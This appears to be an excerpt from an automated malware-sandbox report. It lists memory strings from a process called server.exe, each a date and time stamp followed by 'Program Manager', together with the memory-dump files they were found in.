          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:20:19 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:50:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:42:10 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/04 | 13:48:45 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/17 | 18:46:47 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:48:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 08:11:25 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 10:01:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 22:05:17 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:47:02 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:11:18 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:08:45 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:01:19 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:04:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:01:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 22:26:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:15:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:32:09 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 07:05:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:23:08 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:06:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:02:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 19:48:06 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:34:22 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 20:01:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 21:21:26 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:23:42 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/26 | 19:30:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:52:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 06:09:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:44:49 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:52:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:54:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:15:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:05:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:59:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 04:36:51 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:05:35 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 05:55:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:04:24 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:22:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:58:19 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:10:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:29:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:05:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:39:02 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:26:26 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:02:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 22:52:27 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:02:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 15:22:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:12:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:18:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:14:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 04:33:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 15:25:15 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/07 | 06:28:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 12:34:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:01:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:19:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:06:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:20:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:05:11 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:18:52 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:33:04 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:25:07 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/31 | 02:24:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:19:54 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:30:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:52:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:10:22 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 13:58:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:58:43 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/30 | 19:05:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:27:11 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:19:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:53:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 19:59:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:39:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:39:18 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:45:24 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/25 | 07:56:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:19:23 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/25 | 07:59:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 20:50:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:10:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:07:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:16:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:23:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:47:09 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:47:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:56:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:43:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:36:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 06:18:26 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:16:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:33:55 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 13:23:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:34:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:08:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:54:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:40:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:46:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 22:02:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 08:02:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:52:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 05:22:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:28:39 - Program Manager
